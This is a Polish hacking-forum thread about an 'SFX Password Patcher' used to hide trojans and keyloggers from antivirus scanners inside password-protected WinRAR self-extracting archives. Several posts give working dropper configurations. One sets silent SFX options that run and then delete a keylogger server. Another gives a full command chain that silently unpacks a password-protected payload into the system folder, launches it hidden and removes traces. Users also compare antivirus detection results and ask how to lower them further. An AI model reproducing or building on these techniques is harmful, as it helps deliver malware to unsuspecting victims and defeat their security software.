SFX Password Patcher

[HKN]

Tak, przecież napisałem w last poście to : )
Jakbyś mógł to sprawdzić czy Tobie nie wykrywa to byłbym wdzięczny,

 

[djmentos]

wiem, że pisaleś ale chciałem się upewnić zeby sprawa stała jasno.
nieskromnie przyznam, że nie wiem czemu. może jakiś szczegół pomijasz?

 

[HKN]

Swego czasu cryptowałem Armadillo i był undetectable przez jakiś czas... a teraz tu próbuję, więc zastanawiam się czy era sfx'a też się skończyła ? Nie jestem tego taki pewien, a jednak mi wykrywa.

 

[romet_pl]

Nie rozumiem tego :/
Jak chce uruchomić przez uruchom to piszę że nie można odnalezć.
Chodzi mi o zmniejszenie wykrywalności trojana, ale nie rozumiem tego o co w tym chodzi.
Można prosić o poradnik?

 

[hxv]

Nie rozumiem tego :/[/b]

To się za to nie bierz.

Jak chce uruchomić przez uruchom to piszę że nie można odnalezć.[/b]

Uruchom cmd, przejdź do katalogu gdzie masz program i wtedy go odpal.

Chodzi mi o zmniejszenie wykrywalności trojana, ale nie rozumiem tego o co w tym chodzi.[/b]

Żeby było jasne - po uruchomieniu archiwum wykrywalność jest taka jak oryginalnego pliku (plik zostanie rozpakowany na dysk w niezmienionej postaci i AV znów będą go wykrywać)

Można prosić o poradnik?[/b]

Nie mnie.

 

[romet_pl]

Skoro nie zmniejsza wykrywalności to o co w ogóle chodzi>?
Bo nie rozumiem :/

 

[HKN]

Przeciez zmniejsza go prawie do 0 jak ktoś skanuje tego sfx'a..

 

[P4t3nt]

Mam mały prob, gdy odpalam twój program natychmiastowo on się wyłącza i lipa xP

 

[discovery44]

Witam.
Odpal przez cmd (niewiem czy zadziała bo nie miałem programu)

Pozdrawiam,
discovery

 

[butek123]

Witam!
Czy mógłby ktoś napisać co robię źle? Na skanerze ta czynność podnosi mi wykrywalność o jednego AV.
Mam 2 pliki :
Server.exe
Program.exe
z tych dwóch plików robie archiwum SFX :

path=%temp%
SavePath
Setup=Program.exe
Setup=Server.exe
Silent=1
Overwrite=1
Delete=Server.exe

Po tej czynności przenosze archiwum na pulpit wraz z sfx.exe
start>uruchom>cmd>cd pulpit> sfx.exe Server.exe tajne
No i plik który się tworzy jest bardziej wykrywalny niż sam Server (keylogger), a powinno być całkiem odwrotnie?
Być może coś robię źle, ale sam nie potrafię znaleść błędu.

//Znalazłem błąd, polegal on na tym, że gdy tworzylem srchiwum SFX nie zakładałem hasła

Niech to będzie nauczka dla innych

 

[sosi3]

Wielkie dzięki, właśnie tego szukałem.

 

[Xtremex]

Witam wszystkich

Nie pamiętam już skąd, ale zachowało mi się coś takiego. Najpierw z folderu winrara bierzemy plik "unrar.exe" i kopiujemy do jakiegoś folderu. Kopiujemy też tam serwer i program który ma się razem z nim uruchomić. Zaznaczamy plik z serwerem (przykładowo serwer.exe) robimy archiwum rar z hasłem (w przykładnie będzie to haslo). Teraz gdy już mamy spakowany serwer (serwer.rar, lecz na końcu posta jeszcze coś wspomnę) zaznaczamy 3 pliki (unrar.exe, serwer.rar, plik.obojetnie). Tworzymy archiwum SFX, w komentarzu wpisujemy:

Path=%systemroot%
Setup=plik.obojetnie
Setup=%systemroot%\system32\cmd.exe /c start /min %systemroot%\system32\cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -phaslo serwer.rar&start backup.exe&del unrar.exe backup.rar
Silent=1
Overwrite=2

Wiadomo, gdzie co pozamieniać, lecz user, będzie widział archiwum serwer.rar, więc proponuję dać jakąś inną nazwę

Minusem tego jest to, że w komentarzu rar widać ten kodzik. I co o tym sądzicie?


Pozdrawiam,
Xtremex

 

[superduper]

Czy to:

stripslashes
stripcslashes
strstr
PHPE9568F36-D428-11d2-A769-00AA001ACF42
SQL_FETCH_NEXT
SQL_FETCH_NEXT
SQL_CHAR
SQL_CHAR
SQL_VARCHAR
SQL_VARCHAR
SQL_LONGVARCHAR
SQL_LONGVARCHAR
SQL_DECIMAL
SQL_DECIMAL
SQL_NUMERIC
SQL_NUMERIC
SQL_BIT
SQL_BIT
SQL_TINYINT
SQL_TINYINT
SQL_SMALLINT
SQL_SMALLINT
SQL_INTEGER
SQL_INTEGER
SQL_BIGINT
SQL_BIGINT
SQL_REAL
SQL_FLOAT
SQL_FLOAT
SQL_DOUBLE
SQL_DOUBLE
SQL_BINARY
SQL_BINARY
SQL_VARBINARY
SQL_LONGVARBINARY
SQL_LONGVARBINARY
SQL_DATE
SQL_DATE
SQL_TIME
SQL_TIME
SQL_TIMESTAMP
SQL_TIMESTAMP
odbc_autocommit
odbc_binmode
odbc_close
odbc_close_all
odbc_columns
odbc_commit
odbc_connect
odbc_cursor
odbc
hex_me
hex_me
in
in
ord
dechex
out
out
strlen
out
out
out
calc_raw
calc_raw
in
strlen
in
in
in
out
in
strlen
in
strlen
in
out
in
strlen
out
argv
count
Uzycie: archiwum_sfx.exe haslo_do_archiwum
argv
haslo
argv
file_get_contents
plik
Nie mozna odnalezc pliku 
argv
:(
pass
haslo
strlen
dechex
ereg_replace
calc_raw
4150e
calc_raw
c605
haslo
ordj
dechex
pass
ep_raw
ep_virt
ep_virt
ep_raw
ep_roz
call_1
ep_raw
plik
hex_me
call_1
call_1
substr
calc_raw
go_to
go_to
hexdec
ep_virt
go_to
go_to
ep_roz
go_to_raw
go_to_bytes
go_to_raw
plik
ord
dechex
go_to_bytes
plik
chr
chr
chr
chr
strpos
end_jmp
end_jmp
ep_raw
Brak miejsca w pliku :(
end_jmp
go_to_raw
end_jmp_raw
end_jmp_raw
dechex
calc_raw
end_jmp_raw
end_jmp_raw
strlen
end_jmp_raw
end_jmp_raw
go_to_bytes
pass
added
go_to_raw
end_jmp
added
strlen
dechexj
calc_raw
jmp_raw_2
end_jmp_raw
strlen
go_to_raw
end_jmp_raw
end_jmp_raw
hexdecj
chr
plik
added
jmp_raw_2
dop
dop
strlen
end_jmp
dop
dop
hexdec
chr
plik
argv
.exe
fopen
plik
fwrite
fclose
Done :)

... wyglada troche podobnie do twojego kodu?

Takie cos wyszlo po mojej recznej (sa dekodery Turck MMCache?) dekompilacji...
Jestem ciekaw jak to wyglada w PHP, bylbym bardzo wdzieczny gdybys udostepnil mi kod

 

[gnz]

Kiedy skanuję plik spakowany sfxem na haslo i użyłem Twojego programu skan każdorazowo daje taki wynik:

Result: 5/41 (12.20%)
AVG 8.5.0.425 2009.11.14 Generic13.BTOY
Fortinet 3.120.0.0 2009.11.14 PossibleThreat
Kaspersky 7.0.0.125 2009.11.14 Trojan.Win32.Chifrax.c
VirusBuster 4.6.5.0 2009.11.14 Trojan.Chifrax.AB

Masz jakieś propozycje jak to zmniejszyć? Może jakieś konkretne adresy, lub sygnaturki?